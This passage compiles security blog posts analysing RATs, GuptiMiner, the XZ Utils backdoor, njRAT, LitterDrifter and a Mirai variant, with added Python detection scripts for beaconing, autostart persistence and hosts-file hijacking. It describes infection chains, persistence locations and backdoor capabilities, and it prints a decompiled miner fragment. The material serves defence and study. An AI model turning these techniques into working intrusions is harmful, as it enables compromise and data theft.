Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization’s network. However, with strict access controls, you can limit the consequences of compromised credentials. More stringent rules include:

  • More strict firewall settings
  • Safelisting IP addresses for authorized users
  • Using more advanced antivirus solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to only allow remote access through secure connections established through VPNs or security gateways. You can also use a clientless solution for remote access. It does not require additional plug-ins or software on end-user devices, as these devices are also targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the “never trust, always verify” principle. Consequently, the zero-trust security approach offers precise control over lateral movement instead of full network access. This is critical for suppressing RAT attacks, as attackers use lateral moves to infect other systems and access sensitive data.

Focus on infection vectors

Like other malware, a Remote Access Trojan is a threat only if it is installed and executed on the target computer. Using secure browsing, anti-phishing solutions, and constantly patching systems can minimize the likelihood of a RAT infection. Overall, these actions are good practice for improving security in any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications but contain malicious features associated with the actual application. Tracking the application and system for abnormal behavior can help identify signs that might indicate a Remote Access Trojan.

Monitoring network traffic

An attacker uses RATs to remotely control an infected computer over the network. Consequently, a RAT deployed on a local device communicates with a remote C&C server. Therefore, you should pay attention to unusual network traffic associated with such messages. In addition, it would be best to use tools such as web application firewalls to monitor and block C&C messages.
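To make “unusual network traffic” concrete, here is an added example (my own code, not from the post) that scans constructed outbound-connection records for two RAT tells: a connection to the Back Orifice default port mentioned in the Back Orifice section above, and a beacon, meaning a host that contacts the same remote endpoint at near-constant intervals the way a C&C check-in loop does. The record format, the thresholds and the sample records are assumptions made for the illustration.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed outbound-connection records: "timestamp src dst dst_port proto" (assumed format).
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 203.0.113.7 31337 udp
2024-05-01T10:00:03 10.0.0.5 198.51.100.20 443 tcp
2024-05-01T10:01:00 10.0.0.5 203.0.113.7 31337 udp
2024-05-01T10:02:00 10.0.0.5 203.0.113.7 31337 udp
2024-05-01T10:03:00 10.0.0.5 203.0.113.7 31337 udp
2024-05-01T10:04:00 10.0.0.5 203.0.113.7 31337 udp
2024-05-01T10:00:17 10.0.0.8 198.51.100.20 443 tcp
2024-05-01T10:09:41 10.0.0.8 198.51.100.20 443 tcp
2024-05-01T10:31:05 10.0.0.8 198.51.100.20 443 tcp
"""

# Port named in the post for Back Orifice; a real deployment would use a fuller list.
KNOWN_RAT_PORTS = {31337: "Back Orifice default port"}


def parse_log(text):
    """Turn the raw records into (timestamp, src, dst, port, proto) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, proto = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(port), proto))
    return records


def find_known_rat_ports(records):
    """Connections to ports associated with known RAT families."""
    hits = {(src, dst, port) for _, src, dst, port, _ in records if port in KNOWN_RAT_PORTS}
    return sorted(hits)


def find_beacons(records, min_connections=4, max_jitter=0.2):
    """Flag (src, dst, port) pairs contacted at near-constant intervals.

    Jitter is the standard deviation of the gaps divided by the mean gap; a C&C
    check-in loop produces a low value, human-driven traffic does not.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port, _ in records:
        by_pair[(src, dst, port)].append(ts)
    beacons = []
    for pair, stamps in by_pair.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons.append((pair, round(avg, 1)))
    return beacons


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("known RAT ports:", find_known_rat_ports(recs))
    print("beacons:", find_beacons(recs))
```

In the sample, the host 10.0.0.5 talks to 203.0.113.7 on UDP 31337 exactly once a minute, which trips both checks, while the sporadic HTTPS traffic from 10.0.0.8 trips neither. Real RATs randomize their sleep interval, so the jitter threshold is a knob to tune against your own baseline rather than a fixed truth.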

Implement least privilege

The concept of least privilege implies that applications, users, systems, etc., should be restricted to the permissions and access they need to do their jobs. Therefore, using the least privilege can help limit an attacker’s actions with RAT.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and what you use it for. It is not the program itself that makes such tasks illegal. It’s the implementation. You can test and execute if you’ve written a Remote Access Trojan and have a home lab. You can use it if you have written permission from the other party. However, if you use the RAT maliciously, you may face some legal problems. So, to distinguish, professionals use the term “remote access tools” for legitimate access and control and “remote access trojan” for illegitimate access and control.

GuptiMiner Use eScan to Spread Miners and Backdoors
https://gridinsoft.com/blogs/guptiminer-escan-miners-backdoors/ Thu, 25 Apr 2024 12:58:14 +0000

A recent report by Avast researchers identified an old-timer malware called GuptiMiner. It uses the eScan antivirus update mechanism to stealthily inject backdoors and cryptocurrency mining programs into users’ computer systems and large corporate networks. This is further evidence that cybercriminals are adapting their techniques to bypass modern security measures. Let’s look at the situation.

Campaign discovery and GuptiMiner

Avast specialists analyzed the activity of the GuptiMiner malware, which has been active since 2018. GuptiMiner is a sophisticated malware that aims at spreading backdoors and performing hidden cryptomining in corporate networks. The malware utilizes a multi-stage infection chain. It starts by hijacking antivirus software updates through man-in-the-middle (MitM) attacks, which allows attackers to substitute malicious updates for legitimate ones.

Avast informed eScan and India CERT of the found vulnerability, which was successfully patched on July 31, 2023. However, since users rarely install more than one antivirus, this limits the ability to detect and analyze the full scope of GuptiMiner’s activities.

GuptiMiner’s infection chain

This malware uses a complex infection chain. The attack starts by intercepting eScan antivirus updates: the update package is requested from the server, but an attacker positioned in its path substitutes a malicious one. Next, eScan downloads and decompresses the package, initiating the infection chain via a DLL. This DLL allows the malware to control further downloads and code execution.

GuptiMiner requesting the payload from a real IP address

Next, GuptiMiner uses a sideloading technique to inject malicious code into trusted processes, which allows the program to remain invisible to antivirus systems. The malware also communicates with remote command and control (C2) servers to receive commands and updates. This allows attackers to control infected systems, run additional malicious processes, or conduct cryptocurrency mining.

How does GuptiMiner work?

GuptiMiner analysis revealed that the malware used a variety of sophisticated techniques to install and hide its presence on the system. Key techniques included DLL sideloading, modifying system files, and using forged digital signatures to simulate legitimacy.

Also, one of the characteristic features of GuptiMiner is its ability to modularize infections. This includes performing DNS queries to the attacker’s DNS servers and extracting useful data from innocent-looking images. In addition to its core functionality of installing backdoors, GuptiMiner unexpectedly spreads the XMRig miner used to mine the Monero cryptocurrency.

The process of dynamically assigning mining threads for XMRig (decompiler output):

xmrig_shellcode_copy_ = xmrig_shellcode_copy;
num_cores_ = num_cores;
dword_140020908 = 25;
xmrig_shellcode_copy->max_cpu_usage = '53';
xmrig_shellcode_copy_->threads = '1';
if ( num_cores_ >= 6 )
    xmrig_shellcode_copy_->threads = '2';
if ( num_cores_ >= 8 )
    xmrig_shellcode_copy_->threads = '3';

The malware has been identified as potentially linked to Kimsuky, a prominent North Korean hacking group. This indicates possible state sponsorship and a high degree of organization of the attacks. North Korean hackers have previously shown a certain degree of interest in acquiring cryptocurrency, so this should not be too much of a surprise.

Two Different types of Backdoors

While analyzing the GuptiMiner malware, researchers identified two different types of backdoors. Both types of backdoors were designed to function as part of a large-scale and well-planned campaign. But each was designed to perform specific tasks on infected corporate networks.

  • The first type of backdoor is a modified version of PuTTY Link, which is used to scan for SMB on the local network. This backdoor allows lateral movement (horizontal propagation of malware within the network) to access potentially vulnerable systems running Windows 7 and Windows Server 2008. This facilitates the exploitation of vulnerabilities in legacy operating systems.
  • The second type of backdoor is multifunctional and modular. It accepts commands from the attacker to install additional modules and specializes in finding and stealing locally stored private keys and cryptocurrency wallets. This approach allows attackers to monitor infected systems for long periods of time and activate additional malicious features if necessary.

XZ Utils Backdoor Discovered, Threatening Linux Servers
https://gridinsoft.com/blogs/xz-utils-backdoor-linux/ Tue, 02 Apr 2024 09:32:10 +0000

A backdoor in the liblzma library, a part of the XZ data compression tool, was discovered by Andres Freund. The maintainer of the distribution noticed a half-second delay in the updated version, which eventually led him to the flaw. The latter appears to be the brainchild of one of the new XZ maintainers, who pulled off an outstandingly sophisticated supply chain attack.

Backdoor in XZ Compromised Numerous Linux Systems

The story around the backdoor in the XZ data compression tool is nothing short of marvelous from both ends, and may well be made into a film some day. A person under the nickname Jia Tan had been working his way toward project administrator status since 2021. As is typical for a tech-savvy user of an open-source project, he started by offering fixes for bugs and new functions. Allegedly, by filing a huge number of bug reports, he pressured the maintainer into seeking an assistant, with Jia being the best candidate at that moment.

JiaTan’s account on GitHub

This long road was needed to hide a tiny, deeply concealed backdoor (CVE-2024-3094) that is not even present in the public GitHub repository. The catch actually hides within the version that goes to dependent projects, mainly major Linux distributions. The files responsible for initiating the backdoor appear to be test files. This explains why it took so long: to avoid detection, Jia Tan had to add each piece gradually, making it look like routine development. A proper special operation, one may say.

XZ Utils backdoor

The resulting flaw allowed unauthenticated SSH access to any affected machine. The only conditions are the infected XZ package and SSH usage. This, in turn, endangers thousands of servers that system administrators commonly connect to through this protocol. Linux is the backbone of cloud servers, and such backdoor access effectively means leaking all the data they store.

More of the special operation things surfaced during the ongoing investigation. Shortly after Jia pushed the malicious fixes, numerous XZ update requests popped up in feedback hubs of different Linux distributions. Investigators suppose that either Jia Tan or his associates posted these comments. Some of the distros adhered to them and pulled the infected version, effectively installing the malware into their product.

How Was It Discovered?

The way the backdoor was discovered, on the other hand, sounds more like a miracle. Andres Freund, a developer, noticed that SSH authentication was taking 500ms longer than usual. The operation also started consuming more CPU than it used to, which prompted Andres to search for a new bug. The search quickly led him to the updated XZ version, and consequently to the backdoor built into it.

Andres Freund released his notification regarding the malicious changes on March 29, 2024. It is still unclear how long these changes were live, but Linux distributions were using them in release versions since early March. Among them are the following distros and versions:

Kali: all versions after March 26
Arch: all versions after 2024.03.01; VM images 20240301.218094 and later
Alpine: 5.6 versions before the 5.6.1-r2 update
Debian: only unstable versions, from 5.5.1-alpha-01 to 5.6.1
OpenSUSE: all Tumbleweed and Micro OS versions released between March 7 and March 28, 2024
Red Hat: Fedora Linux Rawhide and Fedora Linux 40

Mitigations and Fixes

Upon discovering the backdoor code, the project maintainers instantly took down the GitHub repository. However, further research showed that there was no need for this: as I’ve mentioned, the malicious code was hidden in test files, mainly used in dependent projects such as distributions. This, however, did not make the task any easier.

Together with the developers and maintainers of the affected distros, Andres Freund compiled both the list of affected versions and possible mitigations. Users should downgrade to versions that do not contain the malicious code, or upgrade to ones where it has already been removed. At the same time, the investigation continues, as this supply chain attack may have more severe effects.
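As an added example of how an administrator can turn the version list above into a repeatable check (my own code, not from the post or from the XZ project), the block below classifies an `xz --version` banner or package version string against the affected window, and pairs it with the other half of the triage that public analyses of CVE-2024-3094 recommended: checking whether the SSH daemon actually loads liblzma, since the backdoor only matters where sshd links it. The affected window follows the post’s Debian entry (5.5.1-alpha through 5.6.1); the command outputs are constructed samples, and the `distro_fixed` set is a hook for distribution revisions such as the Alpine 5.6.1-r2 the post lists as patched.

```python
import re

# Version window the post lists as affected (Debian's 5.5.1-alpha-01 through 5.6.1);
# CVE-2024-3094 itself names upstream 5.6.0 and 5.6.1.
AFFECTED_MIN = (5, 5, 1)
AFFECTED_MAX = (5, 6, 1)


def parse_xz_version(text):
    """Extract the upstream X.Y.Z from `xz --version` output or a package version string."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(part) for part in m.groups())


def classify_xz(text, distro_fixed=frozenset()):
    """Return 'affected', 'fixed' or 'predates-backdoor' for a version string.

    distro_fixed holds full package versions the distribution has declared clean
    even though the upstream number is inside the window (the post lists Alpine's
    5.6.1-r2 as such a case).
    """
    if text.strip() in distro_fixed:
        return "fixed"
    version = parse_xz_version(text)
    if AFFECTED_MIN <= version <= AFFECTED_MAX:
        return "affected"
    if version > AFFECTED_MAX:
        return "fixed"
    return "predates-backdoor"


def sshd_links_liblzma(ldd_output):
    """True if an `ldd sshd` listing shows liblzma loaded into the SSH daemon."""
    return any("liblzma" in line for line in ldd_output.splitlines())


def triage(version_text, ldd_output, distro_fixed=frozenset()):
    """Combine both checks: an affected liblzma matters most where sshd loads it."""
    state = classify_xz(version_text, distro_fixed)
    if state == "affected" and sshd_links_liblzma(ldd_output):
        return "at-risk: downgrade or upgrade xz and restart sshd"
    if state == "affected":
        return "affected xz present, sshd does not load liblzma"
    return state


# Constructed samples standing in for real `xz --version` and `ldd /usr/sbin/sshd` output.
SAMPLE_XZ_BANNER = "xz (XZ Utils) 5.6.1\nliblzma 5.6.1\n"
SAMPLE_LDD = """\
\tlinux-vdso.so.1 (0x00007ffd00000000)
\tlibsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f0000001000)
\tliblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f0000002000)
"""

if __name__ == "__main__":
    print(triage(SAMPLE_XZ_BANNER, SAMPLE_LDD))
```

On a live host you would feed the function the real output of `xz --version` and `ldd $(command -v sshd)`; the version check alone is not enough, because a distribution may have rebuilt a package with the malicious payload removed while keeping the upstream number, which is exactly what the `distro_fixed` parameter is for.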

Backdoor:Win32/Bladabindi!ml Analysis & Removal Guide
https://gridinsoft.com/blogs/backdoorwin32-bladabindiml-analysis-removal-guide/ Tue, 05 Mar 2024 14:37:22 +0000

Backdoor:Win32/Bladabindi!ml is a generic detection name used by Microsoft Defender. It specifically refers to a backdoor malware known as njRAT, capable of hacking into and controlling victims’ computers. In which cases it is a dangerous trojan and in which cases it is a false positive detection, we will understand in this article.

What is Backdoor:Win32/Bladabindi!ml?

Backdoor:Win32/Bladabindi!ml is the Windows Defender detection for njRAT malware, which is categorized as a backdoor. “Bladabindi” is one of many names used by antivirus companies to categorize and identify various malware, including njRAT.

NjRAT is a trojan and can be installed on a computer without the user’s knowledge. It acts as a backdoor, giving attackers remote access and control over the infected system. Once installed, njRAT can perform various activities including collecting sensitive information, recording keystrokes, stealing passwords, intercepting traffic, and even controlling the computer’s webcam and microphone.

njRAT execution chain

Bladabindi!ml can be spread in a variety of ways. This includes email attachments or malicious links, downloads via malicious websites, exploitation of software vulnerabilities, or social engineering. It can also self-propagate by infecting USB drives connected to an infected computer. Cybercriminals can use various methods to trick users into installing njRAT on their computers.

Bladabindi Backdoor Threat Analysis

NjRAT features several versions, detected in different attacks. Nonetheless, they are not much different in terms of their capabilities and effects. Let’s have a look at what dangers a typical Bladabindi sample carries for the system.

Launch and Detection Evasion

Bladabindi employs various techniques to evade detection upon launch. It comes with its own builder, which lets hackers pre-configure the payload to their needs before it is delivered to the victim’s computer. This includes the name of the executable file, startup key creation in the registry, directory placement within the target system, host IP address, and network port, among others.

njRAT builder and custom settings

Such customization enables njRAT to circumvent many static checks and thus avoid antivirus detection. Additionally, the malware utilizes multiple .NET obfuscators, making its code challenging to analyze for both humans and automated systems. These features make njRAT a tough nut to both analyze and detect, and obviously account for its success.

Establishing Persistence

After the initial system checks, the Bladabindi backdoor ensures its persistence within the infected system by creating a startup instance, typically in the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” directory. It also manipulates the Windows registry by creating a key with a unique name and a random set of characters and digits under the “HKEY_CURRENT_USER\Software\32” hive. These actions ensure that the malware executes each time the system boots up. They maintain a foothold within the infected machine even after reboots.

Registry entry created by the malware during installation
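The two persistence artifacts just described, an executable dropped into the Startup folder and a randomly named value under an unusual registry path, are exactly what a defender should audit for. The block below is an added example (my own code, not from the post or from the malware) that runs that audit over a constructed autostart inventory in an assumed `location|name|target` export format; the file names, paths and the `HKCU\Software\32` location are sample values, the latter taken from the post.

```python
import math
from collections import Counter

# Constructed autostart inventory, one "location|name|target" entry per line, in the
# shape an autoruns-style export would give (assumed format, sample values made up).
SAMPLE_INVENTORY = """\
startup|OneDrive.lnk|C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe
startup|updater.exe|C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\updater.exe
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|Discord|C:\\Users\\alice\\AppData\\Local\\Discord\\Update.exe
HKCU\\Software\\32|d4f8a1b2c3e5|C:\\Users\\alice\\AppData\\Roaming\\server.exe
"""

# Registry keys where an autostart value is expected to live.
KNOWN_AUTOSTART_KEYS = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce",
}
# Lower-cased fragment of the Startup folder path named in the post.
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def shannon_entropy(s):
    """Bits of entropy per character; random alphanumeric strings score high."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(name):
    """Heuristic for generated names: long, mixes letters and digits, high entropy."""
    stem = name.rsplit(".", 1)[0]
    has_digit = any(ch.isdigit() for ch in stem)
    has_alpha = any(ch.isalpha() for ch in stem)
    return len(stem) >= 8 and has_digit and has_alpha and shannon_entropy(stem) >= 3.0


def parse_inventory(text):
    """Split the export into (location, name, target) tuples."""
    entries = []
    for line in text.splitlines():
        if line.strip():
            location, name, target = line.split("|", 2)
            entries.append((location, name, target))
    return entries


def audit_autostarts(entries):
    """Return (name, reason) findings for entries matching the persistence patterns."""
    findings = []
    for location, name, target in entries:
        if location == "startup":
            # A shortcut to a program elsewhere is normal; an .exe living inside
            # the Startup folder itself is the pattern described for Bladabindi.
            if STARTUP_DIR in target.lower() and target.lower().endswith(".exe"):
                findings.append((name, "executable dropped directly into the Startup folder"))
        elif location not in KNOWN_AUTOSTART_KEYS:
            findings.append((name, f"autostart value under unexpected key {location}"))
        if looks_random(name):
            findings.append((name, "random-looking entry name"))
    return findings


if __name__ == "__main__":
    for finding in audit_autostarts(parse_inventory(SAMPLE_INVENTORY)):
        print(finding)
```

The entropy heuristic will occasionally flag legitimate vendor entries with serial-number-like names, so treat a hit as something to look at rather than as a verdict; the location check, on the other hand, is a strong signal, since nothing legitimate needs to register an autostart under a key like `HKCU\Software\32`.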

Data Collection & Other Functionality

After finalizing the preparations, njRAT, a.k.a. Bladabindi, performs some basic callouts to the command server. Depending on the response, the malware can switch to idle, start collecting user data, or pull an additional payload from the remote server. The overall list of actions it can perform is the following:

  • Executing remote shell commands
  • Downloading and uploading files
  • Capturing screenshots
  • Logging keystrokes
  • Camera and microphone access
  • Stealing credentials from web browsers and desktop crypto applications

Is Win32/Bladabindi!ml false positive?

Some programs may have features or behaviors that may be mistakenly considered suspicious by antivirus software. As a result, Windows Defender shows a false positive detection. This may be due to the use of certain APIs, network requests, or data encryption that may be characteristic of malware but are also present in legitimate applications.

It’s also worth noting that the antivirus often appends “!ml” to the end of a detection name to indicate that its AI (machine-learning) detection system was used. Although it is a highly effective method, without confirmation from other detection systems it is prone to generating false positive detections.

How to Remove Backdoor:Win32/Bladabindi!ml Virus?

The most reliable way to remove Backdoor:Win32/Bladabindi!ml is to use a reliable antivirus program with updated virus databases. I recommend an antivirus like GridinSoft Anti-Malware; it is well suited to detecting and removing even sophisticated malware like Bladabindi/njRAT.

After removing Win32/Bladabindi!ml, it is recommended to perform additional system scans to make sure that all threats have been successfully removed. And in the future, be vigilant when surfing the Internet and downloading files. Avoid visiting suspicious websites and opening attachments from unreliable sources.

LitterDrifter – Russia’s USB Worm Targeting Ukrainian Entities
https://gridinsoft.com/blogs/litterdrifter-usb-worm/ Wed, 22 Nov 2023 14:34:03 +0000

LitterDrifter is a USB worm intricately linked to the notorious Gamaredon group, which originates from Russia. It has set its sights on Ukrainian entities, adding a concerning layer to the already complex world of state-sponsored cyber espionage. This USB worm, believed to be orchestrated by Russian actors, not only showcases the adaptability and innovation of Gamaredon but also raises questions about the potential geopolitical implications of this latest cyber weapon.

Who are Gamaredon?

Gamaredon’s unique profile goes beyond its commitment to espionage goals. The Security Service of Ukraine (SSU) has linked Gamaredon personnel to the Russian Federal Security Service (FSB), adding a geopolitical twist to the group’s activities. Since the FSB is responsible for counterintelligence, antiterrorism, and military surveillance, this link sheds light on the strategic and state-sponsored nature of Gamaredon’s operations. Despite the ever-changing landscape of its targets, Gamaredon’s infrastructure exhibits consistent patterns, emphasizing the need for careful scrutiny from cybersecurity experts.

What is LitterDrifter?

One of Gamaredon’s tools is the notorious USB-propagating worm, LitterDrifter. This VBS-written malware showcases Gamaredon’s adaptability and innovation. Despite the old-fashioned malware type, it packs quite a lot of functions much needed in modern cyberattacks.

As a part of the APT’s infrastructure, LitterDrifter introduces a global element to Gamaredon’s operations. Beyond its intended targets in Ukraine, this worm has left potential infections in its wake in countries like the USA, Vietnam, Chile, Poland, Germany, and even Hong Kong. The global reach of LitterDrifter adds to the overall potential of the threat actor in globe-scale cyberattacks.

The key functionality of the LitterDrifter worm centers on acting as a remote access tool. In other words, it is a backdoor with worm-like self-spreading capabilities: a hidden, unauthorized access point in a computer system, software, or network that allows access to the target environment. In cyberattacks, backdoors mostly act as initial access and reconnaissance tools, which then “open the gates” for further malware injection.

USB-propagating worm - LitterDrifter

LitterDrifter doesn’t just spread automatically over USB drives. As noted above, its infections have turned up well beyond Ukraine, and this global reach highlights the broader threat it poses to cybersecurity worldwide.

Gamaredon’s Campaign Against Ukraine

Gamaredon Group has exhibited a sustained and targeted cyber espionage campaign against Ukraine and its institutions, including military, non-governmental organizations (NGOs), judiciary, law enforcement, and nonprofit entities, since at least 2013. The group, suspected to have ties to Russian cyber espionage efforts, has consistently focused on infiltrating Ukrainian entities. This is evident in its choice of Ukrainian-language lures and primary targets within the region.

LitterDrifter emerges as yet another tool employed by the group in its multifaceted cyber operations. As researchers’ ongoing monitoring and analysis have revealed, Gamaredon has utilized LitterDrifter alongside various other techniques and malware to achieve its objectives. This has further strengthened the group’s status as an advanced persistent threat against Ukrainian and allied interests.

Protection against LitterDrifter

As LitterDrifter reveals its global impact, it prompts a call for a unified and fortified global cybersecurity defense. The worm’s ability to transcend borders underscores the importance of international collaboration in addressing and mitigating cyber threats.

Protecting from threats like LitterDrifter requires a combination of proactive cybersecurity practices and vigilance. Here are some recommendations to enhance your protection against such worms:

  • Be cautious when inserting USB drives into your computer, especially if they are from unknown or untrusted sources. Consider using USB drives that have read-only switches to prevent unauthorized writing.
  • Regularly back up your important data and store backups in a secure location. In the event of a ransomware attack, having recent backups can help you restore your system without paying the ransom.
  • Follow security best practices such as using strong, unique passwords, enabling two-factor authentication, and limiting user privileges. These practices can add layers of protection against various cyber threats.
  • Keep yourself informed about the latest cybersecurity threats and vulnerabilities. Being aware of the evolving threat landscape enables you to adapt your security measures accordingly.

Mirai variant “Pandora” infects Android TV for DDoS attacks.
https://gridinsoft.com/blogs/mirai-pandora-infects-android-os/ Sat, 09 Sep 2023 12:07:20 +0000

A new variant of the Mirai malware botnet has been detected, infecting low-cost Android TV set-top boxes that are extensively used for media streaming by millions of people. According to analysts, the present Trojan is a fresh edition of the ‘Pandora’ backdoor initially identified in 2015.

The campaign targets low-cost Android TV boxes such as Tanix TX6, MX10 Pro 6K, and H96 MAX X3. These devices have quad-core processors that can launch powerful DDoS attacks, even in small swarms.

Mirai Botnet Aims Android-based TV Boxes

The Mirai botnet can infect devices via malicious firmware updates signed with publicly available test keys, or via malicious apps that are distributed on domains targeting users interested in pirated content. In the first case, firmware updates are either installed by resellers of the devices, or users are tricked into downloading them from websites that promise unrestricted media streaming or better application compatibility.

The ‘boot.img’ file contains the kernel and ramdisk components loaded during Android boot-up. This makes it an excellent persistence mechanism for the malicious service.

Malicious service

The second distribution channel involves the use of pirated content apps. They also offer access to collections of copyrighted TV shows and movies for free or at a low cost. Security experts have identified Android apps that spread the new Mirai malware variant to infected devices. Here is an example:

Site dropping malware

In this case, the malicious apps surreptitiously start the ‘GoMediaService’ during the initial launch and set it to auto-start when the device boots up.

When the ‘gomediad.so’ service is called, it unpacks multiple files, including a command-line interpreter that runs with elevated privileges (‘Tool.AppProcessShell.1’) and an installer for the Pandora backdoor (‘.tmp.sh’).

GoMedia service structure

After being activated, the backdoor establishes communication with the C2 server, and replaces the HOSTS file. After that, it updates itself and then enters standby mode, waiting for instructions from its operators. The malware can launch DDoS attacks using the TCP and UDP protocols, such as generating SYN, ICMP, and DNS flood requests. It can also open a reverse shell, mount system partitions for modification, and perform other functionalities.
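The HOSTS file replacement mentioned above is one of the few Pandora actions a user or administrator can check for directly. As an added example (my own code, not from the post or from the researchers), the block below parses a constructed hosts file and separates the stock loopback entries from three kinds of tampering: names blackholed to the unspecified address, names pinned to loopback, and names redirected to some other address. The sample file and its entries are made up; the classification rules are assumptions that fit a device whose hosts file should contain nothing but loopback entries.

```python
import ipaddress

# Constructed hosts file after tampering; a stock Android or Linux hosts file holds only
# the loopback lines. Hostnames and addresses here are sample values.
SAMPLE_HOSTS = """\
# hosts file (constructed sample)
127.0.0.1       localhost
::1             localhost ip6-localhost
203.0.113.9     update.example-vendor.invalid
203.0.113.9     play.google.com
0.0.0.0         telemetry.example.invalid
127.0.0.1       security-updates.example.invalid   # pinned to loopback
"""

STOCK_NAME_PREFIXES = ("localhost", "ip6-")


def parse_hosts(text):
    """Return (hostname, address) pairs, ignoring comments and blank lines.

    Each address is validated with ipaddress so a corrupted line fails loudly
    instead of being silently skipped.
    """
    mapping = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        address, names = parts[0], parts[1:]
        ipaddress.ip_address(address)
        for name in names:
            mapping.append((name, address))
    return mapping


def find_hijacks(mapping):
    """Classify every non-stock entry as blackholed, pinned-to-loopback or redirected."""
    findings = []
    for name, address in mapping:
        addr = ipaddress.ip_address(address)
        if addr.is_loopback and name.startswith(STOCK_NAME_PREFIXES):
            continue  # the entries every system ships with
        if addr.is_unspecified:
            findings.append((name, address, "blackholed"))
        elif addr.is_loopback:
            findings.append((name, address, "pinned-to-loopback"))
        else:
            findings.append((name, address, "redirected"))
    return findings


if __name__ == "__main__":
    for finding in find_hijacks(parse_hosts(SAMPLE_HOSTS)):
        print(finding)
```

Redirected update or app-store hostnames are the finding that matters most here, because they let the operator feed a device its own “updates”; blackholed telemetry or security hostnames are the usual way malware keeps a device from reporting or updating itself. On a device you administer, the same functions can be pointed at the contents of /etc/hosts, with a legitimate local-network allow list added to the classification if you keep such entries.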

IoC Mirai Botnet

What devices are at risk?

Budget-friendly Android TV boxes often have an uncertain journey from manufacturer to consumer. This leaves the end user unaware of their origins, potential firmware modifications, and the various hands they have passed through.

Even cautious consumers who retain the original ROM and are selective about app installations face a lingering risk of preloaded malware on their devices. It is advisable to opt for streaming devices from trusted brands like Google Chromecast, Apple TV, NVIDIA Shield, Amazon Fire TV, and Roku Stick.

Safety recommendations

For Android TV users, installing apps only from the official app store is advisable. It is also essential to pay attention to the permissions requested by the app. If your app requests access to your phonebook and geo-location, it is best to avoid using it as it could be malware. Additionally, it is crucial not to download or install any hacked apps, as their contents are often infected with malware of some kind.
